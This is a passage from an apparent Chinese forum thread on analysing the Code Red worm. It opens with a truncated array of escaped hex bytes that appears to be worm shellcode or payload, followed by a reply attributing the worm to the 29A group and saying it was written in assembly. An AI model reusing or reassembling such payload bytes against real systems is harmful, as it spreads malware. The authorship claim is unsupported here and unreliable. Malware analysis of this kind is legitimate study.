  \"\\x3a\\xc1\\x68\\xc0\\x57\\xdf\\xc7\\xc0\\x3a\\xc1\\x3a\\xc1\\x68\\xc0\\x57\\xdf\"
  \"\\x27\\xd3\\x1e\\x90\\xc0\\x68\\xc0\\x53\\xa4\\x57\\x1c\\xd1\\x63\\x1e\\xd0\\xab\"
  \"\\x1e\\xd0\\xd7\\x1c\\x91\\x1e\\xd0\\xaf\\xa4\\x57\\xf1\\x2f\\x96\\x96\\x1e\\xd0\"
  \"\\xbb\\xc0\\xc0\\xa4\\x57\\xc7\\xc7\\xc7\\xd7\\xc7\\xdf\\xc7\\xc7\\x3a\\xc1\\xa4\"
  \"\\x57\\xc7\\x68\\xc0\\x5f\\x68\\xe1\\x67\\x68\\xc0\\x5b\\x68\\xe1\\x6b\\x68\\xc0\"
  \"\\x5b\\xdf\\xc7\\xc7\\xc4\\x68\\xc0\\x63\\x1c\\x4f\\xa4\\x57\\x23\\x93\\xc7\\x56\"
  \"\\x7f\\x93\\xc7\\x68\\xc0\\x43\\x1c\\x67\\xa4\\x57\\x1c\\x5f\\x22\\x93\\xc7\\xc7\"
  \"\\xc0\\xc6\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x47\\x14\\xa8\\x96\\xeb\\xb5\\xa4\\x57\"
  \"\\xc7\\xc0\\x68\\xa0\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x4b\\x9c\\x57\\xe3\\xb8\\x

老兄，红色代码是29A病毒组织写的（作者是：wintermute/29A)
是用汇编写的。（不是C语言写的）
:P :P :P :P :P :P

回复喜欢

您需要登录后才可以回帖，登录或者注册

红色代码病毒分析

最新喜欢：